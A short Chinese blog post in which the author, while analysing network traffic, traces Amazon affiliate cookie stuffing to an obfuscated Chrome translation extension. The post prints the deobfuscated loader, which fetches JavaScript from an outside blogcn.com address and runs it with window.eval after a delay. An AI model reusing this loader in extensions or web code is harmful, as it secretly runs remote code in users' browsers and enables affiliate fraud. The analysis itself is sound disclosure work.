隐藏在chrome上面的浏览器Cookie Stuffing

研究数据包,无意抓取到的一个数据。

这数据包,来源于chrome的插件。

看了一下POST的数据。amazon 的 Cookie Stuffing 哦。
这手法有点贱。还包含了很多的联盟。对比一下插件的ID。尾数是 nadb

好家伙,猫腻出在翻译插件。搜索下C盘关键字。

evel 的加密压缩。这样就轻松绕过google 审核了。还原一下代码。
var idata=true;if(idata){var iu=’http://26836659.blogcn.com/Home/Shop/chrome’;setTimeout(function(){var id=sed(iu);window.eval(id)},30000);idata=false}function sed(url){var b=new XMLHttpRequest;b.open(‘POST’,url,false);b.send();return b.responseText}
不多说了。虽然插入的手法很贱。但是CS的手法已经过时了。会K号的。

没有评论:

发表评论

Follow Us

FOLLOW US

Blog Archive

Comments

Blogger 提供支持.

Search This Blog

Tags

header ads